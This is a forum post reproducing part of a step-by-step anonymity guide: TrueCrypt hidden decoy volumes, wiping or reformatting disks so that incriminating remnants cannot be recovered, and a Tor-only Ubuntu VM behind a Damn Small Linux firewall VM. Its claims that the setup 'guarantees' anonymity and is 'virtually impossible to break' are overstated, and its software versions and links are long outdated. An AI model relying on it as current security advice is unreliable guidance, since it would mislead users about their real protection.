When you select a file and mount it to a drive, you are telling your computer that you have a new drive with files and folders on it. It is the same thing as if you had plugged in a usb flash drive, a removable harddrive, or an sd card into your computer. TrueCrypt causes your computer to think that there is an entirely new disk drive on your computer. You can use this disk drive just as if it *was* actually a usb flash drive. You can copy files to it, directories, and use it just as you would use a usb flash drive.

When you are done, simply close all open windows/folders/applications that are using your truecrypt drive letter, and then click "Dismount" from within TrueCrypt while you have the drive letter highlighted. This will once again hide all of this data, accessible only by re-mounting it with the correct password.

*** VERY IMPORTANT SAFETY INFORMATION ***

When a TrueCrypt hidden volume is mounted, someone who has access to your computer can access anything that is inside that hidden volume. If for example you left your computer running while a truecrypt volume was mounted, then if someone gained access to your computer they would be able to see everything you have in that volume. Therefore:

*** ALWAYS REMEMBER TO DISMOUNT ANY TRUECRYPT VOLUME CONTAINING ANY SENSITIVE INFORMATION WHEN YOU ARE NOT USING YOUR COMPUTER ***

You can tell that it is dismounted because the drive letter inside of "TrueCrypt"'s control panel will appear the same as all of the other drive letters, with no information to the right of the drive letter.

You should practice Mounting and Dismounting a few times with both passwords to make sure you understand this process.

Once you have copied files/folders into the hidden volume, do *NOT* touch the files or folders in the outer volume anymore. Remember that both volumes occupy the same single file, and therefore changing the outer volume can damage the hidden volume. Once you have copied files/folders into the outer volume during the installation process, that is the last time you should do so. From that point forward, use ONLY the hidden volume. The outer volume exists only as a decoy if you need it.

=== 6. Securing your Disk ===

This is an involved step which many people may not be able to do right away. If you cannot do this step immediately, then see section 7.

At this point you should understand how to create and use TrueCrypt hidden volumes in order to safeguard any sensitive information. Therefore, you should *NOT* keep any such sensitive information on your hard disk.

At this stage, there are two possibilities:

1. You have never had any sensitive information on your hard disk. In this case, read this section but you can certainly skip it.
2. Up until now, you have stored sensitive information on your hard disk. If so, then you MUST read this section.

If you have ever used this computer to access sensitive information, then all of the security and precautions in the world are totally useless and futile because all someone has to do is access what is left of that sensitive information. I cannot stress this enough.

You can have the most secure TrueCrypt volumes, use TOR, and be the safest most secure user in the world. If you have not made sure that *ALL* remnants of any sensitive information are UTTERLY REMOVED from your hard disk, then all of that effort is totally pointless. You MUST take these actions to safeguard your hard disk, or otherwise you might as well throw away this guide and follow none of the advice herein.

First, I understand that it is troublesome to have to re-format a computer, to back everything up, and reinstall everything. However, if you have ever had sensitive information on your machine, that is what you have to do. Take the following steps:

1. Obtain a removable harddrive or usb flash drive large enough to store anything you need to save.
2. Set up a truecrypt hidden volume on that harddrive big enough to hold all of that information.
3. Set up the truecrypt outer volume as in the previous section. Use the previous section as a guide if you need to.
4. Be sure the hidden volume will have enough space to store all that you are backing up.
5. Copy ALL data you need to back up/save into that hidden volume.

*** IMPORTANT, READ THIS ***

If you have ever used this system to access sensitive information, then you must assume that the sensitive information or remnants of it can be *anywhere* on your hard disk. Therefore, you need to move *EVERYTHING* you intend to save into the hidden truecrypt container. You do not know where sensitive data might be, so you are assuming it can be anywhere. This way you still have ALL of your data and you have lost nothing.

A good analogy is toxic waste. You don't know which barrel might contain the toxic waste, so you treat *ALL* the barrels as potentially toxic. This is the surest way you can protect yourself.

You might be saying, "I have family photos, music, movies that I would have to move to the hidden volume." That is perfectly fine. Remember that you can access that hidden volume just as if it was a drive letter. In fact, ideally, *ALL* of the content on your computer (assuming you value your privacy) should be protected anyways. You lose nothing by securing all of that data.

6. Once you have copied everything you intend to copy, dismount your hidden volume, reboot your computer, and re-mount your hidden volume to make sure everything is there.
7. Now it is time to re-format your entire hard drive. Re-install your operating system of choice (such as Windows 7), and start with a clean slate.
8. Once you have reinstalled your operating system from scratch, follow sections one through five of this guide to reach this point, and then proceed.

=== 7. Temporarily Securing Your Disk, Shredding Free Space ===

Like the previous section, this section applies ONLY IF there is some risk that sensitive data has ever been stored or accessed on this computer. If you are 100% sure that sensitive information has never been accessed using this computer, then you can safely skip this and the previous step.

If you are not prepared to take the actions in the previous step yet, then you should follow the steps in this section until you can. However, you MUST eventually take the actions in step six above. Do not assume you can find/delete all sensitive content. Lists of filenames, image thumbnails, random data, and more *ARE* sitting on your hard disk. Someone who knows how to find it, WILL. That will render all of your other precautions totally futile.

As soon as you can, follow the instructions in step six.

Meanwhile, here is how you can temporarily safeguard yourself until you are able to follow those instructions.

1. Go through your hard disk folder by folder, deleting (or moving to a truecrypt hidden volume) any files that you believe are sensitive/risky.

2. When you are totally sure that you have deleted all such files, go to the following URL: http://www.fileshredder.org

3. Scroll down and look for the button called "Download File Shredder" -- do NOT click any other button, as the page may have ads on it that appear to be download links.

4. Save the file.

5. Run the file, most likely titled: file_shredder_setup.exe

6. "Welcome to the File Shredder Setup Wizard", Click "Next"

7. Select "I accept the agreement" and click "Next"

8. It will choose where to install it, click "Next"

9. Click "Next" again when prompted for the Start Menu folder.

10. "Select Additional Tasks", Click "Next" again

11. Click "Install"

12. Ensuring that "Launch File Shredder" is checked, click "Finish"

13. You should now notice that "File Shredder" is running. You should see the program in your task bar. Click on it to bring up the control panel if it is not up already.

14. On the left is a link that says "Shred Free Disk Space", click it.

15. Choose the drive letter for your hard disk, typically C:, as well as any other drives you wish to shred the free space.

16. Under "Select Secure Algorithm", select "Secure Erasing Algorithm with 7 passes" and click "Next"

17. Click "Start"

This will take some time to finish. Once you have finished shredding your free disk space, it will be impossible or nearly impossible for someone to find one of your deleted files and piece it back together to see what it once was. However, this is NOT enough.

Keep in mind that there may still be records of the filenames that were deleted, partial data from those files, image thumbnails, and more that may be enough to incriminate you. This is only a temporary step you have taken, and you absolutely must take the actions in step 6 above in order to be truly safe.

=== 8. Installing VirtualBox ===

And now we get to the fun part. We are going to create a secure environment for you to browse the internet and communicate in a way that is totally anonymous and untraceable. You will have a setup that is so secure as to be virtually impossible to break.

1. First, go to the following URL: http://www.virtualbox.org

2. Select "Downloads" in the menu on the left.

3. Under "VirtualBox platform packages" is "VirtualBox 4.0.4 for Windows Hosts", next to that is "x86/amd64". Click that.

4. Save the file. It should be titled similar to: "VirtualBox-4.0.4-7011-Win.exe"

5. Run the file.

6. "Welcome to the Oracle VM... Setup Wizard", Click "Next"

7. Click "Next"

8. Click "Next"

9. "Warning: Network Interfaces", click "Yes" but be aware that your internet connection will be temporarily reset for a few seconds.

10. Click "Install"

11. A dialog saying "A program needs your permission to continue" may appear, click "Continue".

12. One or more dialogs asking if you want to install "device software" may come up, select "Install" each time.

13. Optionally check the box "Always trust software from Oracle Corporation."

14. "Oracle VM... installation is complete", Click "Finish" ensuring that "Start Oracle VM after installation" is checked.

Now we have the software we need in order to set up and run virtual machines. On your task bar to the far right, you should notice VirtualBox running. Click on the "VirtualBox" icon if needed in order to bring the VirtualBox control panel into view.

Now it is time to set up a virtual machine. For this, we need to obtain two files. Operating systems, such as windows, are typically installed using a cd or dvd. You put the cd or dvd into your computer, you boot it up, and you follow the instructions in order to install the operating system. Virtual machines work similarly. Before we can use a virtual machine, we have to install an operating system on it.

However, we are *NOT* going to use Windows! We are going to use Linux. Do not be afraid if you have no experience using Linux. I assure you that this will prove to be painless. We actually need two different linux operating systems in order to have a secure system. Before we go through the steps of setting this up, I want to describe to you what we are doing.

Remember earlier in the guide I explained that one of the downsides to using Tor Browser from your main computer is that you might accidentally put a link into a non-Tor browser. The problem with your computer right now is that you can access tor sites, or non-tor sites equally well. That means that you have to be extremely careful to ensure that you are using Tor.

An analogy would be to say that you are typing on a keyboard with red and green keys. You have to be careful to only hit the green keys. If you accidentally hit a red key, then you could compromise your security and anonymity. That is *not* a good position to be in. The purpose of setting up a virtual machine is to make certain that you cannot accidentally reveal your identity or compromise your security.

The computer you are using now has two ways of accessing the internet: TOR, and Non-TOR. The virtual machine we are setting up however will only be able to access the internet using TOR. No other way period. That means that no matter what you do, no matter how hard you try, you will NOT be able to accidentally access any website except through TOR. This *guarantees* that whatever you do on that virtual machine is going to be through TOR.

So how do we achieve this? There are a number of ways to do so. The method presented in this guide is not the only good way, however I do believe that it is both easy to set up and also friendly to users who may not have a great deal of RAM.

First, we are going to set up two different virtual machines. One of them will exist for the sole purpose of making sure that the other one does not accidentally connect to the internet except through TOR. This virtual machine requires very little. You will not be using it for anything. It will simply act as a gatekeeper to ensure that the other Virtual Machine is safe.

The second virtual machine will be what you use for internet browsing, chatting, etc. This virtual machine will be configured in such a way that it can only use TOR and nothing else. The way we will achieve this is to force this second virtual machine to go through the first virtual machine for all internet connections.

Do not worry if this seems complicated. As with the rest of this guide, I am going to walk you through step by step exactly what to do.

First, we have to obtain the operating systems we will need. In this case, we are going to use "Damn Small Linux" (yes that is its real name) for the firewall and we are going to use "Ubuntu" for the main system. The advantage to using "Damn Small Linux" is that we only need 32 MB of ram and no disk space to have an effective firewall.

Let's set up the firewall first:

=== 9. Installing a Firewall ===

1. First, go to the following URL: http://www.damnsmalllinux.org (three l's)
2. Scroll down until you see a link that says "Download"
3. Under "Current Full Mirror List", click any that work. Some may not work at any given time. If one doesn't work, simply hit back on your browser and try another one.
4. At the time of this guide, the following url worked: ftp://ftp.is.co.za/linux/distributions/damnsmall/current/
5. Go to the "current" directory if not already in it.
6. Click on the file called: dsl-4.4.10.iso -- If you cannot find this file, choose the file closest to it. A higher version number is fine. The file will probably be about 50 MB
7. The file should take about 5-10 minutes to download based on your connection.

(IF THE ABOVE STEPS WORKED FOR YOU, SKIP THIS MINI-SECTION)

(If you had trouble with the above steps, read this mini-section)
(With mirrors, it is often the case that a particular mirror site doesn't work. At the time of this writing, several mirrors worked. I am providing detailed instructions for each mirror.)
(Above I have already provided instructions for the mirror ftp://ftp.is.co.za)

MIRROR: http://gd.tuwien.ac.at/opsys/linux/damnsmall
(Go to this URL, and under "Subdirectories" click on "current") if available, select the file called "current.iso" (provided the file is at least 49 MB in size) If not, then choose the closest file to dsl-4.4.10.iso, a higher version # is fine.

MIRROR: http://ftp.belnet.be/packages/damnsmalllinux/
(go to "current" directory, obtain either "current.iso" (if 49 MB or higher) or find file closest to "dsl-4.4.10.iso")

MIRROR: http://ftp.heanet.ie/mirrors/damnsmalllinux.org/
(go to "current" directory, obtain either "current.iso" (if 49 MB or higher) or find file closest to "dsl-4.4.10.iso")

At this point, you should have the file either "current.iso" or "dsl-4.4.10.iso" (or something similar) fully downloaded and saved into your Downloads directory.

Now, go ahead and open up VirtualBox again, most likely by clicking it on the task bar.

8. Click "New" at the top left, an icon that resembles a many-pointed round star.
9. "Welcome to the New Virtual Machine Wizard", click "Next"
10. "VM Name and OS Type": Under "Name" type in: Firewall
11. For Operating System, choose "Linux"
12. For "Version", choose: "Other Linux"
13. Click "Next"
14. "Memory", select "32 MB" and click Next
15. "Virtual Hard Disk", Uncheck "Boot Hard Disk" and click "Next"
16. If a Warning dialog appears, click "Continue"
17. Click "Finish"
18. Now you will notice "Firewall, Powered Off" visible in your VirtualBox control panel. Make sure it is highlighted (it should be) and then right click it, and select "Settings".
19. Select "Network" in the menu to the left.
20. Click on the "Adapter 2" tab.
21. Check "Enable Network Adapter" and next to where it says "Attached to", select "Internal Network" from the pulldown menu.
22. Click "Ok" at the bottom.
23. Once again, right click "Firewall, Powered Off" and select "Start"
24. Check "Do not show this message again" and click "Ok". This is just letting you know that the "RIGHT CTRL KEY" on your keyboard is the "control" key for this virtual machine.
25. "Welcome to the First Run Wizard", click "Next"
26. "Select Installation Media", under "Media Source" is a pull down menu. To the immediate right of that pull down menu is an icon with a folder. Click that folder icon.
27. Locate "current.iso" or "dsl-4.4.10.iso" (or the similar file name) that you downloaded. When located, click "Open". It is likely in the "Downloads" directory of your home folder.
28. Click "Next"
29. Click "Finish"

Now the virtual machine will start to boot up. Simply wait... (This may take up to 5 minutes.)

30. One or more new dialogs may come up saying "VirtualBox Information", just click "Do not show this message again" and click "Ok"

After a few minutes, the booting will finish and you will be looking at the desktop for your firewall virtual machine. To the right of the window you will see some stats that look something like this:

Up: 0 k/s - Down: 0 k/s
Processes: 19
CPU Usage: 10%
RAM Usage: 16.2MB/28.8MB

etc.

Congratulations! You now have a firewall running. Now we will set up this firewall to protect you so that you can safely use TOR from your main virtual machine.

=== 10. Firewall Configuration ===

At this stage you should be looking at the desktop for "DSL" (Damn Small Linux).

I need to talk about the mouse first. This particular virtual machine as well as your main operating system (windows) both want control of your mouse. Both cannot have control of your mouse at the same time however. Therefore, you have to choose whether the mouse will be used by your virtual machine, or by Windows. When you click into your virtual machine, it has the effect of passing control of the mouse to the virtual machine. That means you cannot move your mouse cursor past the boundaries of that virtual machine. In order to give mouse control back to windows, enabling you to move your mouse cursor anywhere, simply press the right ctrl key on your keyboard. That is to say, you have two ctrl keys. One on the left of your keyboard, and one on the right. Press the ctrl key that is on the right of your keyboard. This will give mouse control back to windows.

Practice this a bit. Practice clicking into the window, moving the mouse cursor around, pressing right ctrl, and moving the windows mouse cursor around. Get the feel of it.

You should see a window that looks something like a web browser, with some text in it including words such as "Getting Started with DSL". First, close that window.

(If your mouse is not working, read this mini-section.)

(First, click inside the window that your virtual machine is running in). Now try moving your mouse cursor. If you do not see the mouse cursor moving around, then press (RIGHT CTRL + I). Now move your mouse cursor again. If you notice that you are moving your "main" mouse cursor over the window, but you do not see the "DSL" black mouse cursor moving, then click again into that window. If you do this a few times, you should notice that the mouse begins to work. You may have to press RIGHT CTRL+I a couple of times to get the mouse to work.

1. Once the mouse is working inside of your virtual machine, go ahead and close the window entitled "Getting Started with DSL"

(If you cannot see the full virtual machine window, for example because your screen resolution is set so that some of the window goes too low, read this mini-section).

(First, press RIGHT CTRL+I until you have your main windows white mouse cursor back). Now, click on "Machine" in the menu at the top of the window.
(Select "Switch to Scale Mode")

(Click "Switch")

(Now you will have converted your firewall window to a smaller size, and you will be able to resize it. You may need to press "right ctrl" to get a windows mouse cursor (which you will need in order to resize this window). Now simply resize it to the size that works for you, and then click into the window to be able to use the black mouse cursor inside the virtual machine. I recommend you maximize this window to make sure you can read everything clearly.)

2. Right click anywhere on the desktop, go to System (a red folder), go to Daemons, ssh, and start.

3. Right click again anywhere on the desktop, go to XShells -> Root Access -> Transparent

4. Now you have a window that you can type in. Type exactly as shown below into this window, and hit enter:

passwd

Once you type this and hit enter, it will ask you for a password. This is a password for full access to the firewall. Make it at least 8 characters in size.

*** IMPORTANT: Do not forget your firewall password. You will need it later in the guide. ***

When you have successfully changed your password, it will say "Password changed."

5. Now type exactly as shown below, into the same window:

ifconfig eth1 10.0.3.1

6. It will not say anything after you hit enter, it will just return you back to the prompt.

Now our firewall server is ready. We want to save this state so that we can get back to it easily in the future.
Press RIGHT CTRL+S

7. Now you will be looking at a window that says "Take Snapshot of Virtual Machine". Just click "Ok"

8. Now, let's test this out to confirm it works as we expect. Go ahead and close the virtual machine by clicking the "X" in the top right corner. A menu will come up. Select "Power off the machine" and click ok. Do NOT check the box called "Restore current snapshot".

And now you should be once again at the VirtualBox manager. You will see "Firewall (Snapshot 1), Powered Off"

9. Make sure that "Firewall (Snapshot 1), Powered Off" is selected. At the top right of your VirtualBox Manager is a button that says: "Snapshots (1)". Click it.

10. Click on "Snapshot 1", the top-most selection. This will highlight it.

11. Now right click it, and click on "Restore Snapshot"

12. A dialog box will come up asking if you are sure, click "Restore"

13. Now click the "Start" button at the top with the large green arrow.

14. Any dialog boxes that come up with a check box saying "Do not show this information again", simply check the check-box, and click ok. Do not worry about any of those.

Remember, if you do not have immediate control of the mouse inside the virtual machine, simply press RCTRL+I (press right ctrl and "I" at the same time) and click into it until you have mouse control.

Now your firewall is good to go. Any time you need it, just go to the VirtualBox Manager and follow steps 9 through 14 above. You do not have to go through the whole setup process again at any time in the future. Your firewall is ready.

=== 11. Installing Ubuntu ===

Now we are going to set up the main machine that you will be using TOR with.

1. First, go to this URL: http://www.ubuntu.com

2. Click on the link "Download Ubuntu"

3. Click "Start Download" (This download should take 10-15 minutes)

4. The filename is going to be similar to: ubuntu-10.10-desktop-i386.iso

Now we wait...

While you are waiting for the file to download, go ahead and make sure that your "hidden volume" is mounted in TrueCrypt to a particular drive letter. For example, O: You will need that for the next step.

5. Return to your "VirtualBox Manager". It doesn't matter if the firewall is running or not.

6. Click "New" (the blue round star-icon in the top left) again.

7. "Welcome to the New VirtualMachine Wizard", click "Next"

8. "VM Name and OS Type", under "Name", type "Primary"

9. Next to "Operating System", select "Linux"

10. Next to "Version", select "Ubuntu" and Click "Next"

11. "Memory", by default it selects 512 MB. This is fine. 256 MB is the MINIMUM. The more memory you allocate, the better the virtual machine will function. Click "Next"

12. "Virtual Hard Disk", Make sure "Boot Hard Disk" is checked. Make sure "Create new hard disk" is selected. Click "Next"

13. "Welcome to the Create New Virtual Disk Wizard", click "Next"

14. "Hard Disk Storage Type", select "Fixed-size storage" and click "Next"

15. "Virtual Disk Location and Size", to the right of the text box containing "Primary" is a folder icon. Click the folder icon.

16. Now we have to select a file for the new hard disk image file. On the bottom of this dialog it says "Browse Folders", click on that.

17. Now click on "Computer" in the menu to the left.

18. Scroll to where you see the drive letter you mounted, and double click on it. Ex: Local Disk (O:)

19. Now click "Save"

20. By default 8.00 GB are selected. That is fine. If you have enough space on your hidden volume, increase this to 10 GB. Otherwise, 8 is fine.

21. Under "Location", it should say O:Primary.vdi where O: is replaced by whatever drive letter you mounted your TrueCrypt hidden volume to.

22. Click "Next", then click "Finish"

Now we wait for VirtualBox to create the hard drive we asked for. This may take a few minutes.

Keep in mind this entire virtual machine as well as any of its contents are going to reside within the hidden truecrypt container. This ensures extra security.

23. When this is done, you will see a "Summary" window. Click "Finish".

24. Now, right click on "Primary, Powered Off" in your "VirtualBox Manager", and click "Start"

25. Again we are at the "First Run Wizard", click "Next"

26. "Select Installation Media", under "Media Source" is a pull down menu. Click the "folder icon" to the immediate right of that pulldown menu.

27. Locate "ubuntu-10.10-desktop-i386" (or the similarly named file) from your Downloads directory, or wherever you saved it. Click on it, and click "Open"

28. Click "Next"

29. Click "Finish"

Now simply wait. Your Ubuntu virtual machine will be loading up. This may take a few minutes. Don't worry if you see all kinds of strange messages/text. It is normal.

After a few minutes, you should start to see the Ubuntu desktop load. Unlike your firewall, you will notice that you do not have to click the mouse inside the window. It automatically happens. This is going to be much easier than the "Firewall" step.

Once everything has loaded, you will be looking at a window that says "Install" with a button that says "Install Ubuntu". If you cannot see everything, press RCTRL+F (to go full screen). You can return to windowed mode by RCTRL+F again. Any dialogs can be closed, and you can check the box that says "Do not show me this again."

30. Click "Install Ubuntu"

31. Check "Download updates while installing"

32. Check "Install this third-party software". Click "Forward"

33. Ensure "Erase and use entire disk" is selected, and click "Forward". Remember, this is NOT talking about your hard disk. It is talking about the 8-10 gigabyte virtual disk.

34. Click "Install Now"

35. Now you will be guided through a series of installation related screens. The first screen asks you to select your timezone/time. Select your choice and click "Forward"

36. Now keyboard layout, again select your choice and click Forward. If you are unsure, leave it as is or click "Figure out keyboard layout"

37. "Who are you?" For "Your name" type in: mainuser

38. When you type in "mainuser" the other boxes will fill in automatically. Now click in the text box next to "Choose a password".

39. Do NOT use the same password as the firewall. Come up with a different password.

40. Ensure that "Require my password to log in" as well as "Encrypt my home folder" are selected and checked and proceed.

Now simply wait until the installation is finished. The installation may take a while, and it may appear to stall at some points. As long as the ubuntu mouse cursor shows an animation that is turning around in circles, the installation *is* working. Simply wait until it is done. If after an hour or two the progress bar hasn't moved at all, then go ahead and re-start the installation starting from step 24 (after closing the window and powering down the virtual machine).

Depending on your computer, it could take 2-4 hours. Most likely, it will take about an hour. Once finished, you will see a dialog that says "Installation Complete" with a button that says "Reboot Now". Do NOT press the "Reboot Now" button. Close the 'X' on this window, and Power Down.

41. Now, right click "Primary" and go to "Settings".

42. Click on "Storage" in the left menu. Then click on the "ubuntu-10.10... .iso" under where it says "IDE Controller"

43. To the right it says "Attributes" under that it says "CD/DVD Drive : ..." to the immediate right of that is a cd icon. Click it.

44. Select "Remove disk from virtual drive."

45. Click "Ok"

46. Now, making sure that "Primary" is highlighted, click the "Start" button at the top with the large green arrow.

Now we wait for your newly installed Ubuntu machine to boot up.

47. After a few minutes, you will see a dialog appear that says "mainuser-VirtualBox". Go ahead and click on "mainuser" which has the "person icon" to the left of it.

48. Now it will prompt you for your password. Enter the password you used in the installation process.

49. After a minute or so, you should hear a nice login sound, and you should be fully logged into your virtualmachine.

50. Keep waiting, and a dialog will appear that says "Information available" and "Record your encryption passphrase". Click on: "Run this action now"

51. Type in the same password you used to log in. After that window closes, click "Close" in the dialog box.

Congratulations! You have now set up a virtual machine as well as a firewall to protect it. Now we need to finish configuring the primary virtual machine.

=== 12. Ubuntu Initial Setup ===

Ok, now that we have installed Ubuntu, we need to set it up so that we can use it fully. This also means making sure we can see flash on websites such as youtube.

1. First, we have to install any updates that are pending. At the bottom of your screen, you should notice where it says "Update Manager". Click on that.

2. Now, click on "Install Updates". If you did not see "Update Manager", then skip these two steps.

3. Any time an administrative task is required, you will need to type in your password. This is the same password you used to log in.

Now we wait, this is going to download any necessary security updates to make certain we are using the most current/secure setup possible. This may require downloading hundreds of megabytes. Just go ahead and let it do that, and when everything is downloaded and updated, proceed to the next step. While you wait, Ubuntu may go into screensaver mode. If so, just move the mouse and it will ask you for your password. That will leave screensaver mode.

If the updates are more than a hundred megabytes, it will take quite a while. It may take up to 2-3 hours depending on your computer and internet connection. Nonetheless, this step is critical. Do not skip the updates. Besides ensuring that your setup will be secure, the updates also ensure that all of the applications are up to date and thus most likely to function correctly. Just go ahead and watch a movie for a couple hours, and then return and check on it.

After all of the updates have been downloaded and installed, the "Update Manager" window will now say "Your system is up-to-date" at the top. Further, it will say: "The computer needs to restart to finish installing updates.". Go ahead and press the 'X' in the top right corner of the window, and choose "Send the shutdown signal". If prompted, click "Shut Down". Once it has fully shut down, the window will disappear and you will be back at the VirtualBox manager. Go ahead and right click on "Primary" and click "Start". This will restart the virtual machine.

If a virtual machine fails to shutdown after 10 minutes or so, then go ahead and close the window again by pressing the 'X' but this time choose "Power down". If it still will not shut down, then VirtualBox may have crashed. If so, just follow these instructions:

(Follow the steps in this mini-section if a virtual machine fails to shutdown, or you need to completely close/restart VirtualBox).

(First, press "Ctrl+Alt+Delete", and then click "Task Manager"). Next, locate the process that is running that starts with "VirtualBox". Right click that process, and click "End Process Tree"
(This should force the window to close).

(Now, restart VirtualBox by going to your start menu, All Programs, Oracle VM VirtualBox, VirtualBox).

Now you will have the VirtualBox manager up again. To restart the Ubuntu machine, simply right click on "Primary" and click "Start".

Once your Primary vm has rebooted, you will be again at the login screen. Here as before, click on "mainuser" and then enter in your password. Now your primary machine is fully up to date. Remember, be patient. It may take a few minutes before your virtual machine has fully booted. First you will see the background image and a mouse cursor that can move around, next you should hear the login sound play, and finally you will see the menu at the top and bottom of your virtual machine window. Depending on the speed of your computer, this may take 10 minutes or more. Just be patient. Don't worry if your virtual machine appears to be running too slow, we will speed it up.

Now your Virtual Machine is set up and ready for use.

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
hannah

Registered:
Posts: 797
Reply with quote  #6 
(CONTINUED DOCUMENT)
=== 13. Installing Guest Additions ===

In order to ensure that the Virtual Machine runs as smoothly as possible, we are going to install some additional software to the virtual machine.

1. Go to the "Devices" menu at the top of your virtual machine main window (Machine, Devices, Help), and go to "Install Guest Additions"

2. Go to the "Places" menu at the top of your virtual machine (Applications, Places, System), and click on "VBOXADDITIONS_4.0.4_70112" (the number may be different).

3. At the top of this new window will be the text: "The media has been determined as "UNIX software"." Click on "Open Autorun Prompt"

4. A new dialog may appear saying "This medium contains software intended to be automatically started. Would you like to run it?" Click "Run"

5. Enter your administrative password (the one you use to log into Ubuntu) and click "Ok"

6. Now the VirtualBox Guest Additions installer will begin. This may take some time, so just relax and wait. Depending on your computer, this may take 30 minutes or more.

7. When this is finished, you will see the text "Press Return to close this window." Go ahead and do so.

8. Once that window has closed, go ahead and press the 'X' to close the entire virtual machine window. Select "Send the shutdown signal" and click "Ok".

9. A dialog box will appear. Click on "Shut Down", the top most option.

At this stage it is a good idea to further optimise our virtual machine. When you initially installed it, you most likely selected either 256 MB or 512 MB of RAM. If you have enough RAM to spare, then I highly recommend you increase that to at least 1 GB. Here is how to do so:

1. First, right click on "Primary, Powered off" and go to Settings.

2. Select "System" from the menu on the left.

3. Increase the "Base Memory" to either 1024 MB (1 GB), or some higher value you are comfortable with.

It is also a good idea to increase the video memory available to the virtual machine.

4. Select "Display" from the menu on the left, still inside of "Settings"

5. Increase the "Video Memory" slider to the right as far as you are comfortable with. For example, 128 MB.

6. Check the box "Enable 3D Acceleration".

7. Now click "Ok" at the bottom.

Go ahead and start up Ubuntu again by right clicking "Primary, Powered off" and clicking "Start"

When Ubuntu loads up, go ahead and log in as before using your password. Now wait until Ubuntu is fully booted and the "Applications Places System" menu is visible.

You will probably notice that your virtual machine loads up and runs faster than before.

How well your virtual machine runs depends on how good your computer is. Primarily, RAM and processor speed are the most significant factors. If your computer is modern enough, you should be able to use websites with flash and even watch videos, such as on YouTube, with no problem. If your computer is not as modern, you will still be able to browse websites but may not be able to watch videos. You should still be able to use most flash based websites however.

*** IMPORTANT: Do NOT browse sensitive content YET. At this stage, your virtual machine is not yet configured to use TOR. ***

=== 14. Installing IRC (Optional) ===

*** This section is entirely optional. If you are not interested in installing IRC, skip this section. ***

To install IRC on your new virtual machine, follow these steps:

1. Go to the "Applications" menu, and go to "Ubuntu Software Center"

2. Type "kvirc" in the search box field in the top right.

3. When the results return, select the one called: "KDE-based next generation IRC client" or "KV Irc".

4. Click "Install"

5. Enter your password when prompted.

6. While it installs, you will notice a progress bar. This may take a few minutes depending on the speed of your internet connection.

7. Once it is finished installing, the progress bar will go away. Go ahead and close the "Ubuntu Software Center".

You are probably used to the close/ min/ max buttons being on the top right, as is the case in Windows. You will find them in the top left instead. If you don't like this, don't worry. You can change it later.

Now, let's go ahead and set up KVIrc.

Remember, you are NOT truly anonymous yet.

8. Click on "Applications" in the top menu.

9. Go to "Internet"

10. Click on "KVIrc"

11. "KVIrc Setup" will appear. Go ahead and click "Next" to begin.

12. "Store Configuration in Folder", click "Next"

13. "Please choose a Nickname". You can leave this exactly as is, or you can choose a Nick name then click "Next".

*** IMPORTANT READ THIS ***

Do NOT pick a nick name you have ever used before, or a nick name that can help someone determine who you are. Also, do NOT fill in any other details such as location, age, real name, etc. Leave everything else as is.

You are NOT Anonymous yet.

14. Now you are asked to pick a theme, select "No theme" then click "Next"

15. Now click "Finish" to leave the KVIrc Setup

16. A new window will appear having a list of servers, click "Close"

Now let's connect to the "Freenode" IRC network. By now, you may have many questions about how to use Ubuntu. The #Ubuntu chatroom on Freenode is a great place to start, and where you can ask questions related to how to use Ubuntu and VirtualBox. Please remember, you are NOT anonymous yet and anything you say can be matched to your IP address. Keep the conversation related to technical help, or just learning Ubuntu.

Do NOT discuss TOR.
Do NOT discuss ANY sensitive material.

Remember, this chatroom consists mostly of people who have set up Ubuntu for other reasons. Therefore, they will be able to help you configure it, and answer many questions about how Ubuntu works.

17. At the bottom right of KVIrc is a long text input box. Click inside that box.

18. Type, exactly as shown below, including the "/" character:

/server irc.freenode.net 6667

19. This will connect you to the Freenode IRC network. After a few minutes, you will be connected and a dialog box will appear.

20. Uncheck the box that says "Show this window after connecting", and then click "Close"

21. Now, in the same text box as you typed the /server command, type the following exactly as shown below, including the "/" and "#" characters:

/join #Ubuntu

22. Now you are in the #Ubuntu chatroom. Feel free to discuss the Ubuntu operating system and ask questions related to how to use Ubuntu. Remember:

*** Do NOT discuss TOR or sensitive material. You are NOT anonymous. ***

This is a good opportunity for you to learn how to set up Ubuntu to be the way you want as far as colors, layout, theme and so forth. When you have finished, simply close the "KVIrc" window.

=== 15. Installing Torchat (optional) ===

*** This section is entirely optional. If you are not interested in installing Torchat, skip this section. ***

Torchat is a program you can use to communicate securely and anonymously with other Torchat users. It is only useful if you already know someone who is using it. If you do not know someone using Torchat, then it is best to skip this section and come back to it in the future when you want to install Torchat.

These instructions work for Ubuntu 10.10.

First, installing Torchat is a bit tricky because Ubuntu does not include Tor by default in its repositories. Tor is a requirement for torchat, and therefore we have to first install Tor on Ubuntu. Doing so is not too difficult.

1. First, go to "Applications" -> "Accessories" -> "Terminal". You will see a new window appear with a prompt that looks like this:

mainuser@mainuser-VirtualBox:~$

2. Now, type exactly as shown below, and hit enter:

sudo bash

3. After entering your password, you will be at a new prompt which looks like this:

root@mainuser-VirtualBox:~#

4. Now, either type or copy-paste the below text into this window and then hit enter:

echo "deb http://deb.torproject.org/torproject.org experimental-lucid main" | sudo tee -a /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 886DDD89

5. After you do this, you should see the following at the bottom of your window:

gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)

6. Now, we should be able to install tor. In this same window, type the following commands, one at a time:

apt-get update
apt-get install vidalia privoxy tor

7. (press Y and enter when prompted)

Now we need to obtain the Torchat installation file, follow these steps:

8. In firefox on Ubuntu, go to the following URL: http://code.google.com/p/torchat

9. On the left under where it says "Downloads"

10. One of the files listed will end in .deb, for example torchat-0.9.9.deb. Click on that file name.

11. On the next page, again click on the file name. This should begin the file download.

12. By default, Ubuntu wants to open this file using the "Ubuntu Software Center". This is correct.

Now wait until the file finishes downloading, and then the "Ubuntu Software Center" will appear. Follow these steps:

1. Press "Install"

2. Type in your password when prompted.

After a short wait, Torchat will be installed.

